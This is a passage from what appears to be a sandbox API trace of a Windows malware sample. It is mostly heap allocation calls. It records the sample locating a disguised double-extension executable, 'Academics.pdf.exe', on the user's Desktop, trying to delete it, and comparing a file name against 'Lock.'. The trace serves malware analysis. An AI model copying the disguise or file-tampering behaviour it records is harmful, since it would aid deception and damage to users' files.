hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0162.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0162.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36a0020 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0162.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0162.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0162.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0162.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0162.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0162.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0162.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0162.035] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0162.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0162.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0162.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0162.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0162.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0162.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0162.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0162.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0162.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0162.035] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0162.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0162.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0162.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0162.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0162.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0162.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0162.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0162.036] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0162.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0162.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0162.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0162.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0162.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0162.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0162.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0162.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0162.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0162.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0162.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0162.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0162.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0162.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0162.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0162.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0162.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0162.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0162.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0162.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0162.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0162.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0162.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0162.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0162.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c948 [0162.037] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Academics.pdf.exe", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", lpFilePart=0x8bedfc*="Academics.pdf.exe") returned 0x37 [0162.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0162.038] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe")) returned 0x20 [0162.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb284da00, ftCreationTime.dwHighDateTime=0x1d509d6, ftLastAccessTime.dwLowDateTime=0xb31d7080, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xe73f6400, ftLastWriteTime.dwHighDateTime=0x1d509cb, nFileSizeHigh=0x0, nFileSizeLow=0xdfd0d, dwReserved0=0x29, dwReserved1=0x4, cFileName="Academics.pdf.exe", cAlternateFileName="ACADEM~1.EXE")) returned 0xaa5660 [0162.038] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe")) returned 0 [0162.039] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0162.039] GetLastError () returned 0x5 [0162.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0162.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0162.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0162.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0162.039] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0162.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0162.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0162.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0162.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0162.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0162.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0162.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0162.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0162.040] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0162.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0162.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0162.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0162.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0162.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0162.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0162.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0162.040] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0162.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0162.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0162.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0162.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0162.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0162.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0162.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0162.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0162.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0162.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0162.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0162.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0162.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0162.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0162.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0162.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0162.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0162.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0162.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0162.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0162.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0162.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0162.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0162.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0162.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0162.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c948 [0162.042] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Academics.pdf.exe", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", lpFilePart=0x8bf658*="Academics.pdf.exe") returned 0x37 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0162.042] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe")) returned 0x20 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0162.042] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0162.043] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.043] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0162.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0162.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0162.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0162.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0162.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0162.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0162.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0162.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0162.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0162.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0162.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0162.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bY-NIrDXo_nG.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 